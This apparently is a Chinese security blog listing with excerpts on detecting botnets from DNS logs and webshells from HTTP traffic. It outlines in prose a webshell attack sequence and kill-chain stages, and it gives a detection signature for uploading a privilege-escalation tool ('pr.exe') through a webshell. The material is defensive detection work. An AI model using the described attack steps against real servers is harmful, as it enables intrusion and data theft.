1 概述随着人类社会信息化程度的不断深入，信息系统产生的数据也在呈几何级数增长。对这些数据的深入分析可以得到很多有价值的信息。由于数据量太大以及数据属性的多样性，导致经典的统计分析方法已经无法适用，必须采用以机器学习理论为基础的大数据分析方法。目前，大数据分析的方法已经被广泛用于商业智能（BI）领域，并取得了令人非常满意的效果。这种方法同样可以应用在信息安全领域，用于发现信息系统的异常情况（入侵和攻击、数据泄露等）。利用大数据分析的方法发现异常事件，需要满足几个条件：1）行为日志在内容必须足够详细，可以从日志内容上区分正常行为和异常行为。也就是假定异常行为无论在表面上看多么正常，总是在细节上与正常行为有差异。2）针对不同的分析目标，选用恰当的分析算法。3）对行为描述进行合理的建模。2 基于DNS日志分析的僵尸网络检测2.1 DNS解析请求日志的格式及说明不同的DNS系统及配置参数，生成DNS解析请求日志也不尽相同，这里仅用一种日志加以说明。Jul 22 10:59:59201307221059 GSLZ-PS-DNS-SV07-YanT '17 75 1374461999.999790 1307221059218.203.160.194 53 218.203.199.90 5826 dns 0,0,4692,0|4|5 1 www.baidu.com, 1,11 www.baidu ...继续阅读 (106)

1 webshell的典型攻击序列图下图是一个典型的webshell的攻击序列图，利用web的漏洞，获取web权限，上传小马，安装大马，然后远程调用webshell，执行各种命令，以达到获取数据等恶意目的。2 从kill chain来分析各阶段“看见”能力从kill chain来看，靠采集系统自身的流量的技术手段，在前两个阶段Reconnaissance、Weaponise这两个阶段是很难看到行为。（结合威胁情报可以更大范围的看到这两个阶段的信息），基于流量的payload分析技术可以在Delivery、Exploit、Installation、Command &Control (C2)、Action这几个阶段都能看到攻击行为。Rsa的一段分析材料，对看见能力做了便利的说明。并针对基于流量的分析手段与传统的IDS\IPS\SIEM做了对比。3 从防护方的“安全对抗”能力视角看安全防护能力分几个等级Detect: Can you see/find it?（能否检测到攻击）Deny: Can you stop it from happening? （能否避免遭受攻击）Disrupt: Can you stop it while it’s happening?（能否阻止正在进行的攻击）Degrade: Can you make it not worth it?（能否让攻击者觉得攻 ...继续阅读 (188)

1 “大马”典型操作经过前面多篇文章的全面介绍想必大家对如何检测Webshell都有了一定的认识，今天我们一起探讨一下如何从网络流量中去实际的检测和发现Webshell的。我们知道“大马”的目的就是为了提权以及控制。常见的“大马”一般都是功能较多结构也较为复杂的，“单一文件实现众多功能”是“大马”的设计目的之一，一方面大在功能，另一方面大在体积。在形形色色的“大马”中不难总结其中典型的功能。文件操作：上传、下载、编辑、删除；数据库操作：连接数据库、脱库、插入数据；命令执行：提交自定义命令、“大马”预制命令。当然通常讲的“大马”的功能远不止，但我们将讨论在流量中如何发现这三种功能被攻击者操作进而发现Webshell的。2 典型操作之流量Payload2.1 文件操作让我们来进行一个简单的提权工具的上传的操作，通过Webshell我们可以这样做：在文件成功发送到服务器上之后我们来看一下在服务器端我们从网络流量中抓取的记录：紧接着我们从流量中看一下服务器返回的包的内容：通过抓取实际的网络流量来获取一对Payload他们分别出现在访问请求中和服务器返回的数据中：Request Payload：POST|upfiles|pr.exeReturn Payload：200通过上述Payload我们就可以大概总结出以下结论：该服务器可能已经被入侵并且被成功上传Webshell后门，攻击者正在尝试利 ...继续阅读 (35)

一 “已知”or “未知”已知的已知，已知的未知，未知的未知，这个最近安全行业也谈的比较多，目前圈内热炒的“威胁情报”，其实应该属于“已知的未知”，对本地来说是未知威胁，其实是别的地方已经发生过的威胁。真正的“未知的未知”怎么办，虽然从没发生过的威胁首次在我们身上发生的概率很小很小，但是目前好多攻击都是窃取管理员的身份或者合法用户身份去做一些貌似合法的操作，这些内部发生的“异常”行为，没有外部的“威胁情报”等数据可对比。加密会逐步成为网络流量的常态，基于“协议异常或行为异常”将成为无法解读内容情景下安全威胁检测的重要手段。 基于“内容”检测和基于“行为”检测互补来发现威胁。异常不一定是威胁，但一般来说威胁一定首先是异常。下图也表达了基于白名单的异常行为分析的重要性。当下的安全攻防一个特点就是，未知攻击会越来越多，你所面临的攻击工具可能是从来没有使用过（或者身边的监控视野范围没有看到过），你手上的webshell样本再多，攻击者总是能制作出新的更轻量级功能更全的webshell，如何发现未知的webshell?如何做到天网恢恢疏而不漏？二 基于流量的Webshell的行为检测webshell运行后，B/S数据通过HTTP交互，HTTP请求/响应中可以找到蛛丝马迹，这是动态特征检测先前我们说到过webshell通信是HTTP协议。基于payload的行为分析，不仅对已知webshell ...继续阅读 (38)